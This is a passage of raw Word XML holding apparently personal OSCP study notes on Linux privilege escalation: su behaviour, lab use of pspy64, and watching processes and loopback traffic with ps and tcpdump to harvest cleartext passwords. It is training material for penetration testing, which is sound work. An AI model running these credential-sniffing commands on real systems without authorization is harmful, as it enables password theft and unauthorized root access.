    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keeps most of your current environment variables (including potentially insecure ones).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keeps your current working directory (e.g., /home/joe).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reads root’s .bashrc (if the shell is interactive), not .bash_profile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su - root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ switch to root and make it as if root just logged in fresh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switches to the root user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a login shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resets the environment to what root would normally get at login (safer, more predictable).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reads root’s login shell files like .bash_profile (and indirectly .bashrc).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B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1E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fkka1d9spoj0" w:id="381"/>
      <w:bookmarkEnd w:id="381"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Service footprint enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another helpful example of this was when we ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy64 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">machine 172.16.xxx.19, and saw the Borg process PASSPHRASE that it used to authenticate. So, since it left that footprint, we were able to exploit and use Borg. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B20">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B23">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 18.2.2. Inspecting Service Footprints</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B24">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B25">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System</w:t>
      </w:r>
      <w:hyperlink r:id="rId920">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId921">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">daemons</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are Linux services that are spawned at boot time to perform specific operations without any need for user interaction. Linux servers are often configured to host numerous daemons, like SSH, web servers, and databases, to mention a few.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B26">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System administrators often rely on custom daemons to execute ad-hoc tasks, and they sometimes neglect security best practices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B27">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As part of our enumeration efforts, we should inspect the behavior of running processes to hunt for any anomaly that might lead to an elevation of privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B28">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike on Windows systems, on Linux we can list information about higher-privilege processes such as the ones running inside the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B29">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can enumerate all the running processes with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command and since it only takes a single snapshot of the active processes, we can refresh it using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">watch</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. In the following example, we will run the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command every second via the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">watch</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the results on any occurrence of the word "pass".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2133600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="116" name="image128.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image128.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92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2B2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">watch -n 1 "ps -aux | grep pass"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B2D">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In Listing 33, we notice the administrator has configured a system daemon that is connecting to the local system with eve's credentials in clear text. Most importantly, the fact that the process is running as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not prevent us from inspecting its activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B2E">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B2F">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B30">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B31">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another more holistic angle we should take into consideration when enumerating for privilege escalation is to verify whether we have rights to capture network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B32">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the de facto command line standard for packet capture, and it requires administrative access since it operates on raw sockets. However, it's not uncommon to find IT personnel accounts have been given exclusive access to this tool for troubleshooting purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B33">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To illustrate the concept, we can run tcpdump as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">joe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user who has been granted specific sudo permissions to run it.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B34">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B35">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WARNING: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump cannot be run without sudo permissions. That is because it needs to set up</w:t>
      </w:r>
      <w:hyperlink r:id="rId923">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId924">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">raw sockets</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to capture traffic, which is a privileged operation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B36">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's try to capture traffic in and out of the loopback interface, then dump its content in ASCII using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter. Ultimately, we want to filter any traffic containing the "pass" keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B38">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="490" name="image479.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image479.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92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2B39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="917"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -i lo -A | grep "pass"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B3B">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After a few seconds we are prompted with the root user's clear text credentials. Nice!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B3C">
